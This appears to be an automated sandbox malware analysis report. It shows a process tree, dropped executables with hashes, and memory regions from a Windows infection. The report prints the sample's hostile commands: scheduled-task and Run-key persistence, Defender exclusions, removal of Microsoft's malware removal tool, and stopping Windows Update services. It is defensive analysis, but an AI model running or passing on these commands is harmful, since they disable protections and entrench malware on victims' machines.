                                                                                                                                          5⤵
                                                                                                                                          • Power Settings
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:116
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -standby-timeout-dc 0
                                                                                                                                          5⤵
                                                                                                                                          • Power Settings
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5100
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                                                                                                                                        4⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3344
                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                        4⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        PID:2440
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
                                                                                                                                        4⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:4592
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          5⤵
                                                                                                                                            PID:1412
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            "C:\Windows\system32\schtasks.exe" /run /tn Barac
                                                                                                                                            5⤵
                                                                                                                                              PID:2336
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:3988
                                                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                            "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe" /rl HIGHEST /f
                                                                                                                                            4⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1144
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3924
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                              5⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:3280
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:3572
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:3752
                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:3916
                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:4232
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                              1⤵
                                                                                                                                                PID:2488
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:2468
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4656
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3976
                                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                      1⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2448
                                                                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2420
                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2756
                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2960
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1424
                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1268
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3832
                                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:4804
                                                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3368
                                                                                                                                                                  • C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                                                                                                                    C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:2180
                                                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:624
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:400
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2680
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4500
                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:864
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2808
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2032
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3672
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:3004
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:4696
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:2440
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:5032
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3008
                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                  PID:2436
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2268
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:4260
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4704
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:4660
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4160
                                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4264
                                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3312
                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                            dialer.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1244
                                                                                                                                                                                          • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                            C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4696

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\Program Files\Cuis\bon\Bara.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.4MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b70a5e7260b025e39b8016523a1f2d64

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

                                                                                                                                                                                            • C:\Program Files\Google\Libs\g.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              226B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              fdba80d4081c28c65e32fff246dc46cb

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              50c83dd967d38506982d9a79b52c6729

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              0f8ea53d3372bf0ecc3e22c5635078baa70c28ef

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              2a2ba71672f14aae0ad50ffacdd5dd8280a4c731b344e8dbf2f8e4e89c2403c8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              67917be356b46ba09fef691cde3c5ce76e9b828383a989f1a412950a522aa36003fcf4debf1dc7c7214147ee603380019ff37385cb8f582cb7d47bc0802fe9d2

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              944B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              944B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ef647504cf229a16d02de14a16241b90

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              81480caca469857eb93c75d494828b81e124fda0

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              502KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ea001f076677c9b0dd774ae670efdf63

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.7MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              952f360a4651f948be3a673178631641

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              60e58b89cfce587aa121baf431d55cbbecd21545

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jmcmlosg.0us.ps1

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              60B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.4MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8e40252356a6fb3f8f52d1effa2c2c3c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

                                                                                                                                                                                            • C:\Windows\Tasks\dialersvc32.job

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              643fac3e2b68fc61abae2120d2888f89

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              cf94d54e4d4d459e0000f5ae27a9649e59cbf66f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              10a8da212983226279df59c4bfdb1fa8bf119fcac8621468dd94164246130a32

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5005e7ba0168cdb79ae7efbb475e476b8ea82886955a9ad5a7b307fd95a5e5a436bc0b0387548a2908ae0d84a5ae57f52c45ede1b85d3faa853e6619de203c7c

                                                                                                                                                                                            • C:\Windows\Tasks\dialersvc64.job

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              dfb7de44ef815e0120452fa07f180ef4

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              811c127463c579bc43af9000f78dbc605a7a9bbf

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              91fbd5211eefa7e5154aec0f1f993e8bb65008a64aaf0497ae0adc6f8c1c5ca5

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              92419eba8c363c354e167a6505c9962699cbb71c260a0a96485ca0ac1628096a57075713c8f464302d94dedfdcdc8a858e372664d5ff55e08bf4e90692a72148

                                                                                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              556084f2c6d459c116a69d6fedcc4105

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b42c70c1dbf0d1d477ec86902db9e986

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                                                                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              957940d58a5769d191281571c5f3083a

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a95909ae04181d028fcbb0648ae56d16c71bee09

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              43145028b3f4b992558fc7ac0d0a9437d3a832f1702852ff469c20e5ecd3772f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              2a23f801540397cfd8cb4db2ae81ef24925adcd0995ef535c918d48796d2ba44726a9fa5f2c001187b7c2c358bc33f620cbd30d83b26e8a59e4610489956d28d

                                                                                                                                                                                            • memory/60-76-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/60-75-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/60-77-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/60-80-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/60-82-0x00007FF94BE70000-0x00007FF94BF2E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              760KB

                                                                                                                                                                                            • memory/60-81-0x00007FF94D9F0000-0x00007FF94DBE5000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.0MB

                                                                                                                                                                                            • memory/60-78-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/60-132-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/336-145-0x0000021CFE000000-0x0000021CFE02B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/336-146-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/404-150-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/404-149-0x000002704C960000-0x000002704C98B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/512-454-0x00000294BF740000-0x00000294BF780000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              256KB

                                                                                                                                                                                            • memory/612-137-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/612-135-0x0000019AB7060000-0x0000019AB7084000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              144KB

                                                                                                                                                                                            • memory/612-136-0x0000019AB7090000-0x0000019AB70BB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/624-420-0x00000261F01F0000-0x00000261F020C000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              112KB

                                                                                                                                                                                            • memory/624-450-0x00000261F0210000-0x00000261F022A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              104KB

                                                                                                                                                                                            • memory/624-160-0x00000261EFC40000-0x00000261EFC4A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/624-452-0x00000261F01E0000-0x00000261F01E6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              24KB

                                                                                                                                                                                            • memory/624-447-0x00000261EFC80000-0x00000261EFC8A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/624-131-0x00000261EFFA0000-0x00000261F0055000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              724KB

                                                                                                                                                                                            • memory/624-453-0x00000261F0230000-0x00000261F023A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/624-451-0x00000261F01D0000-0x00000261F01D8000-memory.dmp

